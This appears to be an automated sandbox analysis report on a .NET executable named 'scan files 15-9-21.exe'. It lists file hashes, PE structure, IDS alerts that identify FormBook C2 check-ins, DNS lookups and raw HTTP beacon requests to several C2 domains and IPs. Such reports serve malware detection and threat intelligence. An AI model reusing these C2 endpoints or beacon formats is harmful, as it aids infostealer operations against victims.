                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.19858583337036
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:scan files 15-9-21.exe
                                    File size:569344
                                    MD5:00e32d8a2cbd54e967bfc8f512086ecf
                                    SHA1:f51b70a2117089a87b0daf6f179a3b492acf58f2
                                    SHA256:36d409b61a0f456cb3e593338ebf2db1fae38ea645392d98030bc7e7a0eb9a3c
                                    SHA512:2996b453b9096b7cbd8eadbe602a80bbf1ba9f721079b657e672fcade97ff8b098aabc81ebb1beb97acaece0ab97e9d0cb33fb90af17bcb66d00ba0787763c48
                                    SSDEEP:12288:L9QzWHCM2K4C50eP5X3Ev1s9oQuaZMk7zI7h4UkLNr:ap3C50QU7pqMiZr
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Y...............0.................. ........@.. ....................... ............@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x48c58a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0xEB59C8A3 [Mon Feb 14 13:50:27 2095 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8c5380x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x5a4.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8c51c0x1c.text
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x8a5900x8a600False0.766540692751data7.20919367006IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0x8e0000x5a40x600False0.419921875data4.06388975839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x900000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0x8e0900x314data
                                    RT_MANIFEST0x8e3b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright 2019
                                    Assembly Version1.0.0.0
                                    InternalNameIObserv.exe
                                    FileVersion1.0.0.0
                                    CompanyName
                                    LegalTrademarks
                                    Comments
                                    ProductNameDisciples
                                    ProductVersion1.0.0.0
                                    FileDescriptionDisciples
                                    OriginalFilenameIObserv.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    09/15/21-09:32:30.950508TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.734.98.99.30
                                    09/15/21-09:32:30.950508TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.734.98.99.30
                                    09/15/21-09:32:30.950508TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.734.98.99.30
                                    09/15/21-09:32:31.066398TCP1201ATTACK-RESPONSES 403 Forbidden804977734.98.99.30192.168.2.7
                                    09/15/21-09:32:36.281712TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977980192.168.2.735.237.65.63
                                    09/15/21-09:32:36.281712TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977980192.168.2.735.237.65.63
                                    09/15/21-09:32:36.281712TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977980192.168.2.735.237.65.63
                                    09/15/21-09:32:46.690689TCP1201ATTACK-RESPONSES 403 Forbidden804978334.98.99.30192.168.2.7
                                    09/15/21-09:33:01.969573TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978580192.168.2.799.83.154.118
                                    09/15/21-09:33:01.969573TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978580192.168.2.799.83.154.118
                                    09/15/21-09:33:01.969573TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978580192.168.2.799.83.154.118
                                    09/15/21-09:33:02.127468TCP1201ATTACK-RESPONSES 403 Forbidden804978599.83.154.118192.168.2.7

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2021 09:32:25.311448097 CEST4977680192.168.2.784.34.147.60
                                    Sep 15, 2021 09:32:25.355458975 CEST804977684.34.147.60192.168.2.7
                                    Sep 15, 2021 09:32:25.355602980 CEST4977680192.168.2.784.34.147.60
                                    Sep 15, 2021 09:32:25.355875015 CEST4977680192.168.2.784.34.147.60
                                    Sep 15, 2021 09:32:25.401727915 CEST804977684.34.147.60192.168.2.7
                                    Sep 15, 2021 09:32:25.855149031 CEST4977680192.168.2.784.34.147.60
                                    Sep 15, 2021 09:32:25.940481901 CEST804977684.34.147.60192.168.2.7
                                    Sep 15, 2021 09:32:26.165246964 CEST804977684.34.147.60192.168.2.7
                                    Sep 15, 2021 09:32:26.165589094 CEST4977680192.168.2.784.34.147.60
                                    Sep 15, 2021 09:32:30.931153059 CEST4977780192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:30.950155020 CEST804977734.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:30.950297117 CEST4977780192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:30.950508118 CEST4977780192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:30.969476938 CEST804977734.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:31.066397905 CEST804977734.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:31.066421032 CEST804977734.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:31.066636086 CEST4977780192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:31.066706896 CEST4977780192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:31.370994091 CEST4977780192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:31.390058994 CEST804977734.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:36.128412962 CEST4977980192.168.2.735.237.65.63
                                    Sep 15, 2021 09:32:36.281326056 CEST804977935.237.65.63192.168.2.7
                                    Sep 15, 2021 09:32:36.281476974 CEST4977980192.168.2.735.237.65.63
                                    Sep 15, 2021 09:32:36.281712055 CEST4977980192.168.2.735.237.65.63
                                    Sep 15, 2021 09:32:36.435966015 CEST804977935.237.65.63192.168.2.7
                                    Sep 15, 2021 09:32:36.436259031 CEST4977980192.168.2.735.237.65.63
                                    Sep 15, 2021 09:32:36.436321974 CEST4977980192.168.2.735.237.65.63
                                    Sep 15, 2021 09:32:36.589621067 CEST804977935.237.65.63192.168.2.7
                                    Sep 15, 2021 09:32:46.556646109 CEST4978380192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:46.573898077 CEST804978334.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:46.574109077 CEST4978380192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:46.574167967 CEST4978380192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:46.591782093 CEST804978334.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:46.690689087 CEST804978334.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:46.690709114 CEST804978334.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:46.690870047 CEST4978380192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:46.690979958 CEST4978380192.168.2.734.98.99.30
                                    Sep 15, 2021 09:32:46.712646961 CEST804978334.98.99.30192.168.2.7
                                    Sep 15, 2021 09:32:56.832087994 CEST4978480192.168.2.7172.67.196.84
                                    Sep 15, 2021 09:32:56.849196911 CEST8049784172.67.196.84192.168.2.7
                                    Sep 15, 2021 09:32:56.849431992 CEST4978480192.168.2.7172.67.196.84
                                    Sep 15, 2021 09:32:56.849651098 CEST4978480192.168.2.7172.67.196.84
                                    Sep 15, 2021 09:32:56.866990089 CEST8049784172.67.196.84192.168.2.7
                                    Sep 15, 2021 09:32:56.879559040 CEST8049784172.67.196.84192.168.2.7
                                    Sep 15, 2021 09:32:56.879606009 CEST8049784172.67.196.84192.168.2.7
                                    Sep 15, 2021 09:32:56.879858971 CEST4978480192.168.2.7172.67.196.84
                                    Sep 15, 2021 09:32:56.879893064 CEST4978480192.168.2.7172.67.196.84
                                    Sep 15, 2021 09:32:56.896967888 CEST8049784172.67.196.84192.168.2.7

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2021 09:31:02.172333002 CEST5541153192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:02.213270903 CEST53554118.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:20.911829948 CEST6366853192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:20.942398071 CEST53636688.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:42.785012007 CEST5464053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:42.816731930 CEST53546408.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:56.671912909 CEST5873953192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:56.735091925 CEST53587398.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:57.347942114 CEST6033853192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:57.377293110 CEST53603388.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:58.042824984 CEST5871753192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:58.079823017 CEST53587178.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:58.428492069 CEST5976253192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:58.456912994 CEST53597628.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:58.853620052 CEST5432953192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:58.879784107 CEST53543298.8.8.8192.168.2.7
                                    Sep 15, 2021 09:31:59.454643011 CEST5805253192.168.2.78.8.8.8
                                    Sep 15, 2021 09:31:59.481228113 CEST53580528.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:00.086487055 CEST5400853192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:00.106697083 CEST5945153192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:00.113393068 CEST53540088.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:00.150398016 CEST53594518.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:00.999397039 CEST5291453192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:01.050944090 CEST53529148.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:02.049164057 CEST6456953192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:02.075681925 CEST53645698.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:02.655895948 CEST5281653192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:02.682467937 CEST53528168.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:06.774791956 CEST5078153192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:06.810134888 CEST53507818.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:15.156395912 CEST5423053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:15.200252056 CEST53542308.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:20.220448017 CEST5491153192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:20.252281904 CEST53549118.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:25.266566992 CEST4995853192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:25.306921959 CEST53499588.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:30.899986982 CEST5086053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:30.930033922 CEST53508608.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:35.332555056 CEST5045253192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:35.367420912 CEST53504528.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:36.077837944 CEST5973053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:36.127427101 CEST53597308.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:37.048358917 CEST5931053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:37.086397886 CEST53593108.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:46.523246050 CEST5191953192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:46.555305958 CEST53519198.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:51.709719896 CEST6429653192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:51.762979031 CEST53642968.8.8.8192.168.2.7
                                    Sep 15, 2021 09:32:56.789498091 CEST5668053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:32:56.830826044 CEST53566808.8.8.8192.168.2.7
                                    Sep 15, 2021 09:33:01.890949965 CEST5882053192.168.2.78.8.8.8
                                    Sep 15, 2021 09:33:01.949892998 CEST53588208.8.8.8192.168.2.7
                                    Sep 15, 2021 09:33:07.141978025 CEST6098353192.168.2.78.8.8.8
                                    Sep 15, 2021 09:33:07.173832893 CEST53609838.8.8.8192.168.2.7

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Sep 15, 2021 09:32:15.156395912 CEST192.168.2.78.8.8.80xb760Standard query (0)www.parakhonskiy.comA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:20.220448017 CEST192.168.2.78.8.8.80xe076Standard query (0)www.everybankatm.comA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:25.266566992 CEST192.168.2.78.8.8.80x46a3Standard query (0)www.nordiqueluxury.comA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:30.899986982 CEST192.168.2.78.8.8.80x9434Standard query (0)www.valorplanodesaudemaranhao.infoA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:36.077837944 CEST192.168.2.78.8.8.80x4f9bStandard query (0)www.municipiodeanton.netA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:46.523246050 CEST192.168.2.78.8.8.80x26edStandard query (0)www.quickskiplondon.comA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:51.709719896 CEST192.168.2.78.8.8.80x1078Standard query (0)www.lifewithbriana.comA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:56.789498091 CEST192.168.2.78.8.8.80x8524Standard query (0)www.singularity.instituteA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:33:01.890949965 CEST192.168.2.78.8.8.80x47f8Standard query (0)www.getcenteredwithclay.comA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:33:07.141978025 CEST192.168.2.78.8.8.80x33eeStandard query (0)www.actonetheatre.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Sep 15, 2021 09:32:15.200252056 CEST8.8.8.8192.168.2.70xb760Name error (3)www.parakhonskiy.comnonenoneA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:20.252281904 CEST8.8.8.8192.168.2.70xe076Name error (3)www.everybankatm.comnonenoneA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:25.306921959 CEST8.8.8.8192.168.2.70x46a3No error (0)www.nordiqueluxury.com84.34.147.60A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:30.930033922 CEST8.8.8.8192.168.2.70x9434No error (0)www.valorplanodesaudemaranhao.infovalorplanodesaudemaranhao.infoCNAME (Canonical name)IN (0x0001)
                                    Sep 15, 2021 09:32:30.930033922 CEST8.8.8.8192.168.2.70x9434No error (0)valorplanodesaudemaranhao.info34.98.99.30A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:36.127427101 CEST8.8.8.8192.168.2.70x4f9bNo error (0)www.municipiodeanton.net35.237.65.63A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:46.555305958 CEST8.8.8.8192.168.2.70x26edNo error (0)www.quickskiplondon.comquickskiplondon.comCNAME (Canonical name)IN (0x0001)
                                    Sep 15, 2021 09:32:46.555305958 CEST8.8.8.8192.168.2.70x26edNo error (0)quickskiplondon.com34.98.99.30A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:51.762979031 CEST8.8.8.8192.168.2.70x1078Name error (3)www.lifewithbriana.comnonenoneA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:56.830826044 CEST8.8.8.8192.168.2.70x8524No error (0)www.singularity.institute172.67.196.84A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:32:56.830826044 CEST8.8.8.8192.168.2.70x8524No error (0)www.singularity.institute104.21.44.60A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:33:01.949892998 CEST8.8.8.8192.168.2.70x47f8No error (0)www.getcenteredwithclay.com99.83.154.118A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:33:07.173832893 CEST8.8.8.8192.168.2.70x33eeName error (3)www.actonetheatre.comnonenoneA (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.nordiqueluxury.com
                                    • www.valorplanodesaudemaranhao.info
                                    • www.municipiodeanton.net
                                    • www.quickskiplondon.com
                                    • www.singularity.institute

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.74977684.34.147.6080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:32:25.355875015 CEST5201OUTGET /mej0/?ZTSpa=l0iLI2tDMbyWX17YzQI3VU6Ovc+Srds2u4QKsmMGezHC91xioYtP6wjZJcIMhpUbXqNeFFgVfw==&vP=JtCxKN HTTP/1.1
                                    Host: www.nordiqueluxury.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.74977734.98.99.3080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:32:30.950508118 CEST5202OUTGET /mej0/?ZTSpa=JBp6XH2M4Q0SiKTdqMGnH1VhHOjyZ1YS2BfWCv8a5VwMthBJctfaCfrdZAs0prUxB4i8ziLjxQ==&vP=JtCxKN HTTP/1.1
                                    Host: www.valorplanodesaudemaranhao.info
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 15, 2021 09:32:31.066397905 CEST5202INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Wed, 15 Sep 2021 07:32:31 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "6139ed55-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.74977935.237.65.6380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:32:36.281712055 CEST5212OUTGET /mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN HTTP/1.1
                                    Host: www.municipiodeanton.net
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 15, 2021 09:32:36.435966015 CEST5213INHTTP/1.1 301 Moved Permanently
                                    Content-Type: text/html; charset=UTF-8
                                    Location: https://www.municipiodeanton.net//mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&vP=JtCxKN
                                    Server: Microsoft-IIS/10.0
                                    X-Powered-By: ASP.NET
                                    Date: Wed, 15 Sep 2021 07:32:36 GMT
                                    Connection: close
                                    Content-Length: 259
                                    Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 75 6e 69 63 69 70 69 6f 64 65 61 6e 74 6f 6e 2e 6e 65 74 2f 2f 6d 65 6a 30 2f 3f 5a 54 53 70 61 3d 4b 42 35 61 4d 45 2f 77 4c 6c 46 79 5a 52 48 56 61 65 42 79 52 61 31 36 6f 61 59 53 4c 47 35 76 54 77 54 6d 50 6b 52 69 75 43 46 37 6d 57 6e 45 47 63 79 7a 61 6c 30 6d 57 70 6e 74 41 31 45 64 54 34 48 41 41 65 78 4d 51 51 3d 3d 26 61 6d 70 3b 76 50 3d 4a 74 43 78 4b 4e 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                    Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.municipiodeanton.net//mej0/?ZTSpa=KB5aME/wLlFyZRHVaeByRa16oaYSLG5vTwTmPkRiuCF7mWnEGcyzal0mWpntA1EdT4HAAexMQQ==&amp;vP=JtCxKN">here</a></body>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.74978334.98.99.3080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:32:46.574167967 CEST5226OUTGET /mej0/?ZTSpa=a/1Q0lHImOSlB3OMiE52M5irpU60+rDCM9jGEsCAFmqZfqxrPXb+yY2uJ0P5II+wgFq1rM2W6g==&vP=JtCxKN HTTP/1.1
                                    Host: www.quickskiplondon.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 15, 2021 09:32:46.690689087 CEST5226INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Wed, 15 Sep 2021 07:32:46 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "6139ed55-113"
                                    Via: 1.1 google
                                    Connection: close
